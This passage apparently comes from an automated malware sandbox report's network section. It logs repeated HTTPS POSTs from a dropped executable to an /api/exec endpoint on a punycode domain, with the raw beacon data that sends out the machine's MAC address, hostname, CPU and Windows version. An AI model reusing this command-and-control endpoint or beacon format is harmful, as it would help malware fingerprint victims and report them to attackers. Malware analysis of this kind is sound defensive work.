                                                                                                                          Nov 19, 2024 19:16:07.000370026 CET50159443192.168.2.5212.193.169.65
                                                                                                                          Nov 19, 2024 19:16:07.000741959 CET50159443192.168.2.5212.193.169.65
                                                                                                                          Nov 19, 2024 19:16:07.000766039 CET44350159212.193.169.65192.168.2.5
                                                                                                                          Nov 19, 2024 19:16:07.808129072 CET44350159212.193.169.65192.168.2.5
                                                                                                                          Nov 19, 2024 19:16:07.808224916 CET50159443192.168.2.5212.193.169.65
                                                                                                                          Nov 19, 2024 19:16:11.126287937 CET50159443192.168.2.5212.193.169.65
                                                                                                                          Nov 19, 2024 19:16:11.126315117 CET44350159212.193.169.65192.168.2.5
                                                                                                                          Nov 19, 2024 19:16:11.127367973 CET44350159212.193.169.65192.168.2.5
                                                                                                                          Nov 19, 2024 19:16:11.128029108 CET50159443192.168.2.5212.193.169.65
                                                                                                                          Nov 19, 2024 19:16:11.128479004 CET50159443192.168.2.5212.193.169.65
                                                                                                                          Nov 19, 2024 19:16:11.128479004 CET50159443192.168.2.5212.193.169.65
                                                                                                                          Nov 19, 2024 19:16:11.128532887 CET44350159212.193.169.65192.168.2.5
                                                                                                                          Nov 19, 2024 19:16:11.128838062 CET44350159212.193.169.65192.168.2.5
                                                                                                                          Nov 19, 2024 19:16:11.128920078 CET44350159212.193.169.65192.168.2.5
                                                                                                                          Nov 19, 2024 19:16:11.129019976 CET50159443192.168.2.5212.193.169.65
                                                                                                                          Nov 19, 2024 19:16:11.129019976 CET50159443192.168.2.5212.193.169.65

                                                                                                                          UDP Packets

                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                          Nov 19, 2024 19:15:12.194583893 CET6018353192.168.2.51.1.1.1
                                                                                                                          Nov 19, 2024 19:15:13.042112112 CET53601831.1.1.1192.168.2.5

                                                                                                                          DNS Queries

                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                          Nov 19, 2024 19:15:12.194583893 CET192.168.2.51.1.1.10x8c62Standard query (0)id.xn--80akicokc0aablc.xn--p1aiA (IP address)IN (0x0001)false

                                                                                                                          DNS Answers

                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                          Nov 19, 2024 19:15:13.042112112 CET1.1.1.1192.168.2.50x8c62No error (0)id.xn--80akicokc0aablc.xn--p1ai212.193.169.65A (IP address)IN (0x0001)false

                                                                                                                          HTTP Request Dependency Graph

                                                                                                                          • id.xn--80akicokc0aablc.xn--p1ai:443

                                                                                                                          HTTPS Proxied Packets

                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          0192.168.2.549982212.193.169.654433380C:\Users\user\AppData\Roaming\fat\ast.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-19 18:15:14 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                          Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                          Content-Length: 269
                                                                                                                          2024-11-19 18:15:14 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 63 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 76 73 71 6c 68 74 64 76 75 6e 6b 69 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 33 30 32 34 39 34 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                          Data Ascii: 1McC-F4-BB-57-0D-C9HS53687091200HVvsqlhtdvunkiHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-3024940/Microsoft Windows 10 Pro (10.0.


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          1192.168.2.549985212.193.169.654433380C:\Users\user\AppData\Roaming\fat\ast.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-19 18:15:15 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                          Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                          Content-Length: 269
                                                                                                                          2024-11-19 18:15:15 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 63 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 76 73 71 6c 68 74 64 76 75 6e 6b 69 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 33 30 32 34 39 34 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                          Data Ascii: 1McC-F4-BB-57-0D-C9HS53687091200HVvsqlhtdvunkiHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-3024940/Microsoft Windows 10 Pro (10.0.


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          2192.168.2.549988212.193.169.654433380C:\Users\user\AppData\Roaming\fat\ast.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-19 18:15:16 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                          Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                          Content-Length: 269
                                                                                                                          2024-11-19 18:15:16 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 63 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 76 73 71 6c 68 74 64 76 75 6e 6b 69 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 33 30 32 34 39 34 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                          Data Ascii: 1McC-F4-BB-57-0D-C9HS53687091200HVvsqlhtdvunkiHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-3024940/Microsoft Windows 10 Pro (10.0.


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          3192.168.2.549991212.193.169.654433380C:\Users\user\AppData\Roaming\fat\ast.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-19 18:15:17 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                          Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                          Content-Length: 269
                                                                                                                          2024-11-19 18:15:17 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 63 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 76 73 71 6c 68 74 64 76 75 6e 6b 69 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 33 30 32 34 39 34 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                          Data Ascii: 1McC-F4-BB-57-0D-C9HS53687091200HVvsqlhtdvunkiHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-3024940/Microsoft Windows 10 Pro (10.0.


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          4192.168.2.549994212.193.169.654433380C:\Users\user\AppData\Roaming\fat\ast.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-19 18:15:18 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                          Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                          Content-Length: 269
                                                                                                                          2024-11-19 18:15:18 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 63 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 76 73 71 6c 68 74 64 76 75 6e 6b 69 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 33 30 32 34 39 34 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                          Data Ascii: 1McC-F4-BB-57-0D-C9HS53687091200HVvsqlhtdvunkiHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-3024940/Microsoft Windows 10 Pro (10.0.


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          5192.168.2.549997212.193.169.654433380C:\Users\user\AppData\Roaming\fat\ast.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-19 18:15:19 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                          Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                          Content-Length: 269
                                                                                                                          2024-11-19 18:15:19 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 63 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 76 73 71 6c 68 74 64 76 75 6e 6b 69 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 33 30 32 34 39 34 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                          Data Ascii: 1McC-F4-BB-57-0D-C9HS53687091200HVvsqlhtdvunkiHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-3024940/Microsoft Windows 10 Pro (10.0.


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          6192.168.2.550000212.193.169.654433380C:\Users\user\AppData\Roaming\fat\ast.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-19 18:15:19 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                          Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                          Content-Length: 269
                                                                                                                          2024-11-19 18:15:19 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 63 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 76 73 71 6c 68 74 64 76 75 6e 6b 69 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 33 30 32 34 39 34 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                          Data Ascii: 1McC-F4-BB-57-0D-C9HS53687091200HVvsqlhtdvunkiHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-3024940/Microsoft Windows 10 Pro (10.0.


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          7192.168.2.550003212.193.169.654433380C:\Users\user\AppData\Roaming\fat\ast.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-19 18:15:20 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                          Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                          Content-Length: 269
                                                                                                                          2024-11-19 18:15:20 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 63 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 76 73 71 6c 68 74 64 76 75 6e 6b 69 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 33 30 32 34 39 34 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                          Data Ascii: 1McC-F4-BB-57-0D-C9HS53687091200HVvsqlhtdvunkiHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-3024940/Microsoft Windows 10 Pro (10.0.


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          8192.168.2.550006212.193.169.654433380C:\Users\user\AppData\Roaming\fat\ast.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-19 18:15:21 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                          Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                          Content-Length: 269
                                                                                                                          2024-11-19 18:15:21 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 63 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 76 73 71 6c 68 74 64 76 75 6e 6b 69 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 33 30 32 34 39 34 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                          Data Ascii: 1McC-F4-BB-57-0D-C9HS53687091200HVvsqlhtdvunkiHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-3024940/Microsoft Windows 10 Pro (10.0.


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          9192.168.2.550009212.193.169.654433380C:\Users\user\AppData\Roaming\fat\ast.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-19 18:15:22 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                          Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                          Content-Length: 269
                                                                                                                          2024-11-19 18:15:22 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 63 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 76 73 71 6c 68 74 64 76 75 6e 6b 69 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 33 30 32 34 39 34 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                          Data Ascii: 1McC-F4-BB-57-0D-C9HS53687091200HVvsqlhtdvunkiHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-3024940/Microsoft Windows 10 Pro (10.0.


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          10192.168.2.550012212.193.169.654433380C:\Users\user\AppData\Roaming\fat\ast.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-19 18:15:23 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                          Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                          Content-Length: 269
                                                                                                                          2024-11-19 18:15:23 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 63 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 76 73 71 6c 68 74 64 76 75 6e 6b 69 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 33 30 32 34 39 34 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                          Data Ascii: 1McC-F4-BB-57-0D-C9HS53687091200HVvsqlhtdvunkiHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-3024940/Microsoft Windows 10 Pro (10.0.


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          11192.168.2.550021212.193.169.654433380C:\Users\user\AppData\Roaming\fat\ast.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-19 18:15:26 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                          Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                          Content-Length: 269
                                                                                                                          2024-11-19 18:15:26 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 63 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 76 73 71 6c 68 74 64 76 75 6e 6b 69 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 33 30 32 34 39 34 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                          Data Ascii: 1McC-F4-BB-57-0D-C9HS53687091200HVvsqlhtdvunkiHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-3024940/Microsoft Windows 10 Pro (10.0.


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          12192.168.2.550024212.193.169.654433380C:\Users\user\AppData\Roaming\fat\ast.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-19 18:15:26 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                          Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                          Content-Length: 269
                                                                                                                          2024-11-19 18:15:26 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 63 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 76 73 71 6c 68 74 64 76 75 6e 6b 69 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 33 30 32 34 39 34 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                          Data Ascii: 1McC-F4-BB-57-0D-C9HS53687091200HVvsqlhtdvunkiHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-3024940/Microsoft Windows 10 Pro (10.0.


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          13192.168.2.550027212.193.169.654433380C:\Users\user\AppData\Roaming\fat\ast.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-19 18:15:27 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                          Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                          Content-Length: 269
